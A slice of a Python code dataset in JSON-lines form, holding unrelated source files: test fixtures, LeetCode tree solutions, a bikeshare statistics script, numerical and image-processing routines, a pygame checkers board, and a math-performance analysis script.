agreement_id=contract_agreement.id,\n comments=\"blah blah bleh blah\",\n line_description=\"LI Planned\",\n amount=200.24,\n can_id=1,\n date_needed=datetime.date(2043, 1, 1),\n status=BudgetLineItemStatus.PLANNED,\n psc_fee_amount=2.34,\n created_by=1,\n )\n loaded_db.add(planned_bli)\n loaded_db.commit()\n\n yield contract_agreement\n\n loaded_db.delete(planned_bli)\n loaded_db.commit()\n\n\n@pytest.fixture()\ndef direct_agreement(loaded_db):\n direct_agreement = DirectAgreement(\n name=\"Feature Test Direct\",\n number=\"BDD0969\",\n payee=\"Somebody who needs money\",\n agreement_type=AgreementType.DIRECT_ALLOCATION,\n research_project_id=1,\n )\n loaded_db.add(direct_agreement)\n loaded_db.commit()\n\n yield direct_agreement\n\n loaded_db.delete(direct_agreement)\n loaded_db.commit()\n\n\n@scenario(\"delete_agreement.feature\", \"Contract Agreement with only draft BLIs\")\ndef test_contract_draft_bli():\n pass\n\n\n@scenario(\"delete_agreement.feature\", \"Contract Agreement with non-draft BLIs\")\ndef test_contract_non_draft_bli():\n pass\n\n\n@scenario(\"delete_agreement.feature\", \"Non-Contract Agreement\")\ndef test_non_contract():\n pass\n\n\n@given(\"I am logged in as an OPS user with the correct authorization\", target_fixture=\"client\")\ndef client(auth_client):\n # TODO: Authorization stuff\n return auth_client\n\n\n@given(\"I have a contract agreement with only draft BLIs\", target_fixture=\"agreement\")\ndef contract_draft_bli(contract_with_draft_bli):\n return contract_with_draft_bli\n\n\n@given(\"I have a contract agreement with non-draft BLIs\", target_fixture=\"agreement\")\ndef contract_non_draft_bli(contract_with_planned_bli):\n return contract_with_planned_bli\n\n\n@given(\"I have a non-contract agreement\", target_fixture=\"agreement\")\ndef non_contract(direct_agreement):\n return direct_agreement\n\n\n@when(\"I delete the agreement\", target_fixture=\"submit_response\")\ndef delete_agreement(client, agreement):\n resp = 
client.delete(f\"/api/v1/agreements/{agreement.id}\")\n return resp\n\n\n@then(\"I should get a message that it was successful\")\ndef delete_success(submit_response):\n assert submit_response.status_code == 200\n\n\n@then(\"I should get an error message that it's invalid\")\ndef delete_failure(submit_response):\n assert submit_response.status_code == 400\n","sub_path":"backend/ops_api/tests/ops/features/test_delete_agreement.py","file_name":"test_delete_agreement.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122078019","text":"\"\"\"\n199. Binary Tree Right Side View\n- Medium\n- Tree, DFS, BFS, Recursion, Queue\n- Link: https://leetcode.com/problems/binary-tree-right-side-view/\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n# Solution 1: BFS\n# Time: O(N) | Space: O(N) - skewed tree\n# [With List]\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n ans = []\n if not root:\n return ans\n\n curLevel = [root]\n\n while curLevel:\n ans.append(curLevel[-1].val)\n nextLevel = []\n for node in curLevel:\n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n\n curLevel = nextLevel\n return ans\n\n# [With Deque]\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n ans = []\n if not root: return ans\n \n nextLevel = deque([root,])\n \n while nextLevel:\n curLevel = nextLevel\n nextLevel = deque()\n while curLevel:\n node = curLevel.popleft()\n \n if node.left:\n nextLevel.append(node.left)\n if node.right:\n nextLevel.append(node.right)\n ans.append(node.val)\n return ans\n \n\n# Solution 2: One deque with size measurement\n# 計算當下 deque 的長度的同時也限制了 list iteration 的次數\n# Time: O(N) | Space: O(N) - skewed tree\nclass Solution:\n def rightSideView(self, 
root: TreeNode) -> List[int]:\n ans = []\n if not root: return ans\n \n q = deque([root,])\n \n while q:\n level_length = len(q)\n \n for i in range(level_length): # 跑完後會進行下一個 level 的計算\n node = q.popleft()\n \n if i == level_length - 1:\n ans.append(node.val)\n \n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n return ans\n","sub_path":"leetcode/199_binary_tree_right_side_view.py","file_name":"199_binary_tree_right_side_view.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"464932957","text":"# Copyright 2015 0xc0170\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport shutil\n\nimport yaml\nfrom unittest import TestCase\n\nfrom project_generator.project import Project\nfrom project_generator.generate import Generator\n\nproject_1_yaml = {\n 'common': {\n 'sources': ['test_workspace/main.cpp'],\n 'includes': ['test_workspace/header1.h'],\n 'macros': ['MACRO1', 'MACRO2'],\n 'target': ['target1'],\n 'core': ['core1'],\n 'tools_supported': ['iar_arm', 'uvision', 'coide', 'unknown'],\n 'output_type': ['exe'],\n 'debugger': ['debugger_1'],\n 'linker_file': ['test_workspace/linker.ld'],\n }\n}\n\nprojects_yaml = {\n 'projects': {\n 'project_1' : ['test_workspace/project_1.yaml']\n },\n 'settings' : {\n 'definitions_dir': ['./notpg/path/somewhere'],\n 'export_dir': ['projects/{workspace}/{tool}_{target}/{project_name}']\n 
}\n}\n\ndef test_output_directory_formatting():\n path, depth = Project._generate_output_dir('aaa/bbb/cccc/ddd/eee/ffff/ggg')\n\n assert depth == 7\n assert os.path.normpath(path) == os.path.normpath('../../../../../../../')\n\nclass TestProject(TestCase):\n\n \"\"\"test things related to the Project class\"\"\"\n\n def setUp(self):\n if not os.path.exists('test_workspace'):\n os.makedirs('test_workspace')\n # write project file\n with open(os.path.join(os.getcwd(), 'test_workspace/project_1.yaml'), 'wt') as f:\n f.write(yaml.dump(project_1_yaml, default_flow_style=False))\n # write projects file\n with open(os.path.join(os.getcwd(), 'test_workspace/projects.yaml'), 'wt') as f:\n f.write(yaml.dump(projects_yaml, default_flow_style=False))\n\n # now that Project and PgenWorkspace accepts dictionaries, we dont need to\n # create yaml files!\n self.project = next(Generator(projects_yaml).generate('project_1'))\n\n # create 3 files to test project\n with open(os.path.join(os.getcwd(), 'test_workspace/main.cpp'), 'wt') as f:\n pass\n with open(os.path.join(os.getcwd(), 'test_workspace/header1.h'), 'wt') as f:\n pass\n with open(os.path.join(os.getcwd(), 'test_workspace/linker.ld'), 'wt') as f:\n pass\n\n def tearDown(self):\n # remove created directory\n shutil.rmtree('test_workspace', ignore_errors=True)\n shutil.rmtree('projects', ignore_errors=True)\n\n def test_project_yaml(self):\n # test using yaml files and compare basic data\n project = next(Generator('test_workspace/projects.yaml').generate('project_1'))\n assert self.project.name == project.name\n # fix this one, they should be equal\n #self.assertDictEqual(self.project.project, project.project)\n\n def test_name(self):\n assert self.project.name == 'project_1'\n\n def test_copy(self):\n # test copy method which shojld copy all files to generated project dir by default\n self.project._fill_export_dict('uvision')\n self.project._copy_sources_to_generated_destination()\n\n def test_set_output_dir_path(self):\n 
self.project._fill_export_dict('uvision')\n assert self.project.project['export']['output_dir']['path'] == os.path.join('projects', 'uvision_target1','project_1')\n","sub_path":"tests/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295988395","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n#Dictionary of csv file we will use\r\nCITY_DATA = { 'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv' }\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n city = ''\r\n month = ''\r\n day = ''\r\n while not city in CITY_DATA.keys():\r\n city = input('What is the name of the city you would like to analyze chicago, new york city or washington\\n')\r\n \r\n month_list = ['all', 'january', 'february', 'march', 'april', 'may', 'june', 'july',\r\n 'august', 'september', 'october', 'november', 'december']\r\n while not month in month_list:\r\n month = input(\"Please select a month all, january, february, ... , june\\n\")\r\n if month != 'all':\r\n month = month_list.index(month)\r\n days_in_week = ['all', 'monday','sunday','tuesday','wednesday','thursday', 'friday', 'saturday']\r\n while day not in days_in_week:\r\n day = input(\"Please select a day of the week all, monday, tuesday, ... 
sunday\\n\")\r\n \r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n df = pd.read_csv(CITY_DATA[city])\r\n df['Start Time'] = pd.to_datetime(df['Start Time']) \r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n\r\n if month != 'all': \r\n df = df.query('month == 1'.format(month))\r\n \r\n if day != 'all':\r\n df = df.query('day_of_week == \"{}\"'.format(day.title()))\r\n return df\r\n\r\n\r\ndef time_stats(df, city, month, day):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n if month == \"all\":\r\n month_list = ['all', 'january', 'february', 'march', 'april', 'may', 'june', 'july',\r\n 'august', 'september', 'october', 'november', 'december']\r\n most_common_month_index = df['month'].mode()[0]\r\n month_name = month_list[most_common_month_index]\r\n print(\"The month {} had the most travel is {}\\n\".format(city, month_name.title()))\r\n\r\n if day == \"all\":\r\n print(\"The day {} had the most travel is {}\\n\".format(city, df['day_of_week'].mode()[0]))\r\n df['hour'] = df['Start Time'].dt.hour\r\n print(\"The hour {} has the most travel was {}\".format(city, df['hour'].mode()[0]))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df, city):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The 
Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n\r\n print(\"The most common used start station for {} was {}\\n\".format(city, df['Start Station'].mode()[0])) \r\n\r\n print(\"The most common used end station for {} was {}\\n\".format(city, df['End Station'].mode()[0])) \r\n\r\n n_combos = df.groupby(['Start Station', 'End Station']).size().nlargest(1)\r\n print('The most frequent combination of in {} was \\n{}\\n'.format(city,n_combos))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df, city):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n print(\"The total travel time for {} was {} minutes\".format(city,df['Trip Duration'].sum() / 60 ))\r\n\r\n print('The average travel time for {} was {} minutes'.format(city, df['Trip Duration'].mean()/60))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df, city):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n usertypes = df.groupby('User Type')['User Type'].count()\r\n print('The count of each type of user in {} is \\n{}\\n'.format(city, usertypes))\r\n if 'Gender' in df.columns:\r\n gendertypes = df.groupby('Gender')['Gender'].count()\r\n print('The count of each gender in {} are \\n{}\\n'.format(city, gendertypes))\r\n if 'Birth Year' in df.columns:\r\n print('In {} \\nthe most common year of birth was {}\\nthe most recent year of birth was {}\\nthe most recent year of birth was {}\\n'\r\n .format(city, df['Birth Year'].mode()[0], df['Birth Year'].max(), df['Birth Year'].min()))\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n 
df = load_data(city, month, day)\r\n time_stats(df,city, month, day)\r\n station_stats(df, city)\r\n trip_duration_stats(df, city)\r\n user_stats(df, city)\r\n\r\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"38066784","text":"import numpy as np\r\n\r\ndef isDDM(m, n):\r\n for i in range(0, n):\r\n sum = 0\r\n for j in range(0, n):\r\n sum = sum + abs(m[i][j])\r\n\r\n sum = sum - abs(m[i][i])\r\n\r\n if (abs(m[i][i]) < sum):\r\n return False\r\n\r\n return True\r\n\r\ndef seidel(A, b, eps):\r\n n = len(A)\r\n x = np.zeros(n)\r\n\r\n converge = False\r\n Iteration = 0\r\n if ((isDDM(A, n))):\r\n while not converge:\r\n x_new = np.copy(x)\r\n for i in range(n):\r\n s1 = sum(A[i][j] * x_new[j] for j in range(i))\r\n s2 = sum(A[i][j] * x[j] for j in range(i + 1, n))\r\n x_new[i] = (b[i] - s1 - s2) / A[i][i]\r\n\r\n converge = np.sqrt(sum((x_new[i] - x[i]) ** 2 for i in range(n))) <= eps\r\n Iteration += 1\r\n x = x_new\r\n print('Кількість ітерацій :', Iteration)\r\n print('Кількість ітерацій :', x)\r\n return x\r\n else:\r\n return \"Не розв'язується\"\r\n\r\n\r\nA = np.array([[4, -1, -1, 0],\r\n [-1, 4, 0, -1],\r\n [-1, 0, 4, -1],\r\n [0, -1, -1, 4]])\r\n\r\nb = np.array([2, 2, 2, 2])\r\neps = 0.1\r\nprint('Рішення :', seidel(A, b, eps))","sub_path":"чмла3.py","file_name":"чмла3.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177908999","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: 
/Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/corporate_memberships/migrations/0005_auto_20151120_1552.py\n# Compiled at: 2020-03-30 17:48:03\n# Size of source mod 2**32: 617 bytes\nfrom django.db import migrations\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('corporate_memberships', '0004_auto_20151120_1538')]\n operations = [\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='apply_threshold'),\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='individual_threshold'),\n migrations.RemoveField(model_name='corporatemembershiptype',\n name='individual_threshold_price')]","sub_path":"pycfiles/tendenci-12.0.3-py3-none-any/0005_auto_20151120_1552.cpython-37.py","file_name":"0005_auto_20151120_1552.cpython-37.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74168961","text":"\"\"\"\n中序遍历,左右指针串联\n\"\"\"\nclass TreeNode:\n def __init__(self, x, l=None, r=None):\n self.val = x\n self.lc = l\n self.rc = r\n\ndef convert(root):\n if not root:\n return None\n stack = []\n head = None\n pre = None\n p = root\n while p or stack:\n while p:\n stack.append(p)\n p = p.lc\n\n p = stack.pop()\n if not head:\n head = p\n pre = p\n else:\n pre.rc = p\n p.lc = pre\n pre = p\n\n p = p.rc\n\n return head\n\nroot = TreeNode(4, TreeNode(2, TreeNode(1), TreeNode(3)), TreeNode(5, r=TreeNode(6)))\nhead = convert(root)\np = head\nprint(p.rc.rc.rc.rc.lc.val, '4')\nwhile p:\n print(p.val)\n p = p.rc","sub_path":"剑指offer/026-二叉搜索树与双向链表/BST2BiList.py","file_name":"BST2BiList.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"445351781","text":"'''\n File name: findDerivatives.py\n Author: Tarmily Wen\n Date created: Dec. 
8, 2019\n'''\n\nimport numpy as np\nfrom scipy import signal\nimport cv2\n\n'''\n File clarification:\n Compute gradient put ginformation of the inrayscale image\n - Input I_gray: H x W matrix as image\n - Output Mag: H x W matrix represents the magnitude of derivatives\n - Output Magx: H x W matrix represents the derivatives along x-axis\n - Output Magy: H x W matrix represents the derivatives along y-axis\n - Output Ori: H x W matrix represents the orientation of derivatives\n'''\n\n\ndef findDerivatives(I_gray):\n # smoothing kernels\n gaussian = np.array(\n [[2, 4, 5, 4, 2], [4, 9, 12, 9, 4], [5, 12, 15, 12, 5], [4, 9, 12, 9, 4], [2, 4, 5, 4, 2]]) / 159.0\n\n # kernel for x and y gradient\n dx = np.asarray([[-1.0, 0.0, 1.0], [-2.0, 0.0, 2.0], [-1.0, 0.0, 1.0]])\n dy = np.asarray([[1.0, 2.0, 1.0], [0.0, 0.0, 0.0], [-1.0, -2.0, -1.0]])\n\n ###############################################################################\n # Your code here: calculate the gradient magnitude and orientation\n ###############################################################################\n\n Gx= signal.convolve2d(gaussian, np.rot90(dx, 2), 'same')\n Gy= signal.convolve2d(gaussian, np.rot90(dy, 2), 'same')\n\n Magx = signal.convolve2d(I_gray, np.rot90(Gx, 2), 'same')\n Magy = signal.convolve2d(I_gray, np.rot90(Gy, 2), 'same')\n\n Mag = np.sqrt(Magx*Magx+Magy*Magy)\n\n Ori = np.arctan2(Magy, Magx)/np.pi*180\n\n return Mag, Magx, Magy, Ori\n\n\nif __name__ == '__main__':\n I_g = np.arange(0, 81, 1)\n I_g = I_g.reshape(9, 9)\n findDerivatives(I_g)\n","sub_path":"projects/project4CannyEdge/Code/findDerivatives.py","file_name":"findDerivatives.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"530372629","text":"import pygame\n\ndef draw_board():\n \"\"\" Draw the board for the checkers game \"\"\"\n\n pygame.init()\n colors = [(245, 222, 179), (139, 69, 19)] # Set up colors [saddlebrown, 
wheat]\n\n n = 10 # 8x8 Board, so n = 8\n surface_sz = 480 # Proposed physical surface size.\n sq_sz = surface_sz // n # sq_sz is length of a square.\n surface_sz = n * sq_sz # Adjust to exactly fit n squares.\n\n # Create the surface of (width, height), and its window.\n surface = pygame.display.set_mode((surface_sz, surface_sz))\n\n # Loading the images\n black_checker = pygame.image.load(\"images/black_checker.png\")\n white_checker = pygame.image.load(\"images/white_checker.png\")\n black_king = pygame.image.load(\"images/black_king.png\")\n white_king = pygame.image.load(\"images/white_king.png\")\n\n # Use an extra offset to centre the ball in its square.\n # If the square is too small, offset becomes negative,\n # but it will still be centered :-)\n ball_offset = (sq_sz - black_checker.get_width()) // 2\n\n while True:\n\n # Look for an event from keyboard, mouse, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT:\n break\n\n # Draw a fresh background (a blank chess board)\n for row in range(n): # Draw each row of the board.\n c_index = row % 2 # Alternate starting color\n for col in range(n): # Run through cols drawing squares\n the_square = (col * sq_sz, row * sq_sz, sq_sz, sq_sz)\n surface.fill(colors[c_index], the_square)\n # Now flip the color index for the next square\n c_index = (c_index + 1) % 2\n\n # Now that squares are drawn, draw the pieces.\n for col in range(0, 10, 2):\n for row in range(0, 4):\n if row % 2 == 0:\n surface.blit(black_checker, (col * sq_sz + ball_offset + sq_sz, row * sq_sz + ball_offset))\n elif row % 2 == 1:\n surface.blit(black_checker, (col * sq_sz + ball_offset, row * sq_sz + ball_offset))\n\n for col in range(0, 10, 2):\n for row in range(6, 10):\n if row % 2 == 0:\n surface.blit(white_checker, (col * sq_sz + ball_offset + sq_sz, row * sq_sz + ball_offset))\n elif row % 2 == 1:\n surface.blit(white_checker, (col * sq_sz + ball_offset, row * sq_sz + ball_offset))\n\n\n pygame.display.flip()\n\n pygame.quit()\n\nif 
__name__ == \"__main__\":\n draw_board()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"207904731","text":"\n\nfrom xai.brain.wordbase.nouns._bitter import _BITTER\n\n#calss header\nclass _BITTERER(_BITTER, ):\n\tdef __init__(self,): \n\t\t_BITTER.__init__(self)\n\t\tself.name = \"BITTERER\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"bitter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bitterer.py","file_name":"_bitterer.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545298529","text":"\nfrom format_text import format_text\nfrom item import ItemContainer\n\n\nclass Room:\n def __init__(self, name, description, items=[]):\n self.name = name\n self.description = description\n self.items = ItemContainer(items)\n\n def __str__(self):\n return (\n format_text(f\"You are standing in the {self.name}\")\n + \"\\n\"\n + format_text(self.description)\n )\n\n def move(self, direction):\n try:\n return getattr(self, f\"{direction}_to\")\n except AttributeError:\n #print (f\"Error: No room found for direction '{direction}'\")\n return None\n","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90790869","text":"\"\"\"This is interesting because it ssh connects to a remote server. I used it for prototyping, but it wasn't very\nhelpful because of how the databases were being managed within the script. I couldn't use this in command, that is. 
\"\"\"\nimport os\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom sshtunnel import SSHTunnelForwarder\nimport ast\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom pymongo import MongoClient\n\npd.set_option('max_columns', 1000)\npd.set_option('max_info_columns', 1000)\npd.set_option('expand_frame_repr', False)\npd.set_option('display.max_rows', 30000)\npd.set_option('max_colwidth', 4000)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\nclient = MongoClient()\n# db_number = client['math_book_info']\n# db_origin = client['math_exercise_origins']\n# db_performance = client['math_performance']\n\n\n\ndef the_big_one(book, df_number, df_origin, df_performance):\n # todo: maybe just remove the offending documents from the database\n if 'chapter' in df_performance.columns.tolist():\n df_performance.drop('chapter', 1, inplace=True)\n if 'miss_list' in df_performance.columns.tolist():\n df_performance.drop('miss_list', 1, inplace=True)\n\n df_performance = df_performance. \\\n query('date == date'). \\\n assign(date=pd.to_datetime(df_performance['date'])). 
\\\n sort_values(['date', 'start_chapter', 'start_problem'])\n\n df_performance['end_chapter'] = df_performance['end_chapter'].astype(str)\n df_performance_test = df_performance.loc[df_performance['end_chapter'].str.contains('test', na=False)]\n df_performance_ass = df_performance.loc[~df_performance['end_chapter'].str.contains('test', na=False)]\n\n # these columns have different types across the various collections, which makes for a bit of a headache\n df_performance_ass['start_chapter'] = df_performance_ass['start_chapter'].astype(float).astype(int)\n df_performance_ass['end_chapter'] = df_performance_ass['end_chapter'].astype(float).astype(int)\n\n # assignments\n start_chapter_ass = df_performance_ass['start_chapter'].iloc[0]\n start_problem_ass = df_performance_ass['start_problem'].iloc[0]\n if isinstance(start_problem_ass, int):\n start_problem_ass = str(start_problem_ass)\n\n end_chapter_ass = df_performance_ass['end_chapter'].iloc[-1]\n end_problem_ass = df_performance_ass['end_problem'].iloc[-1]\n if isinstance(end_problem_ass, int):\n end_problem_ass = str(end_problem_ass)\n\n alphabet = 'abcdefghijklmnopqrstuvwxyz'\n df_grande_ass = pd.DataFrame()\n for chapter in range(int(float(start_chapter_ass)), int(float(end_chapter_ass)) + 1):\n df_temp = pd.DataFrame()\n lesson_probs = df_number.query('chapter == {}'.format(chapter)).iloc[0]['num_lesson_probs']\n mixed_probs = int(df_number.query('chapter == {}'.format(chapter)).iloc[0]['num_mixed_probs'])\n origin_probs = df_origin.query('chapter == {}'.format(chapter)).iloc[0]['origin_list']\n if isinstance(origin_probs, str):\n origin_probs = ast.literal_eval(origin_probs)\n missed_probs = []\n for dic in df_performance_ass.query('start_chapter == {}'.format(chapter))['miss_lst'].values.tolist() + df_performance_ass.query('end_chapter == {}'.format(chapter))['miss_lst'].values.tolist():\n try:\n missed_probs += dic[str(chapter)]\n except:\n pass\n missed_probs = list(set(missed_probs))\n\n if 
start_chapter_ass == end_chapter_ass:\n if start_problem_ass.isdigit():\n problem_lst = range(int(start_problem_ass), int(end_problem_ass) + 1)\n origin_lst = origin_probs[int(start_problem_ass): int(end_problem_ass) + 1]\n\n else:\n # I'm assuming the end_problem would not also be a letter\n start_ind = alphabet.find(start_problem_ass)\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, int(end_problem_ass) + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs[: int(end_problem_ass)]\n\n else:\n if chapter == start_chapter_ass:\n if start_problem_ass.isdigit():\n problem_lst = list(range(int(start_problem_ass), mixed_probs + 1))\n origin_lst = origin_probs[int(start_problem_ass) - 1:]\n\n else:\n start_ind = alphabet.find(start_problem_ass)\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, mixed_probs + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs\n\n elif chapter == end_chapter_ass:\n if end_problem_ass.isdigit():\n start_ind = 0\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, int(end_problem_ass) + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs[: int(end_problem_ass)]\n\n else:\n start_ind = 0\n end_ind = alphabet.find(end_problem_ass)\n problem_lst = list(alphabet[start_ind: end_ind + 1])\n origin_lst = (end_ind - start_ind + 1) * [np.nan]\n\n else:\n start_ind = 0\n end_ind = alphabet.find(lesson_probs)\n problem_lst = list(alphabet[start_ind: end_ind + 1]) + list(range(1, mixed_probs + 1))\n origin_lst = (end_ind - start_ind + 1) * [np.nan] + origin_probs\n\n df_temp['problem'] = problem_lst\n df_temp['origin'] = origin_lst\n df_temp['book'] = book\n df_temp['chapter'] = chapter\n df_temp['correct'] = df_temp.apply(lambda x: 0 if str(x['problem']) in missed_probs else 1, axis=1)\n\n df_grande_ass = 
df_grande_ass.append(df_temp)\n\n df_grande_ass.reset_index(drop=True, inplace=True)\n\n df_grande_ass['date'] = ''\n df_p_g = df_performance_ass.sort_values('date').iterrows()\n\n row_p = next(df_p_g)[1]\n\n\n # todo: here\n # print(df_performance_ass)\n\n\n\n for ind, row in df_grande_ass.iterrows():\n df_grande_ass.set_value(ind, 'date', row_p['date']) # FutureWarning: set_value is deprecated and will be removed in a future release. Please use .at[] or .iat[] accessors instead\n\n if (row['chapter'] == int(float(row_p['end_chapter']))) and (str(row['problem']) == str(row_p['end_problem'])):\n # if (int(float(row['chapter'])) == int(float(row_p['end_chapter']))) and (str(row['problem']) == str(row_p['end_problem'])):\n try:\n row_p = next(df_p_g)[1]\n except:\n print('boom!')\n\n\n # tests\n df_grande_test = pd.DataFrame()\n for ind, row in df_performance_test.iterrows():\n df_temp = pd.DataFrame()\n df_temp['problem'] = range(1, 21)\n df_temp['book'] = book\n df_temp['chapter'] = row['end_chapter']\n df_temp['date'] = row['date']\n\n if isinstance(row['miss_lst'], str):\n miss_lst = ast.literal_eval(row['miss_lst'])\n else:\n miss_lst = row['miss_lst']\n # if row['miss_lst']:\n if miss_lst:\n # missed_probs = row['miss_lst'][row['end_chapter']]\n missed_probs = miss_lst[row['end_chapter']]\n else:\n missed_probs = []\n\n df_temp['correct'] = df_temp.apply(lambda x: 0 if str(x['problem']) in missed_probs else 1, axis=1)\n\n df_grande_test = df_grande_test.append(df_temp)\n\n return df_grande_ass, df_grande_test\n\n\ndef query_performance(name):\n df_assignment = pd.DataFrame()\n df_test = pd.DataFrame()\n\n # for book in ['Math_5_4', 'Math_6_5', 'Math_7_6', 'Math_8_7', 'Algebra_1_2', 'Algebra_1', 'Algebra_2']:\n if name == 'Calvin':\n book = 'Algebra_1_2'\n else:\n book = 'Math_8_7'\n\n if name:\n\n # perf_temp = pd.DataFrame(list(db_performance[book].find({'kid': name})))\n perf_temp = pi_data_fetch('math_performance', book) #, {'kid': name})\n print(perf_temp); 
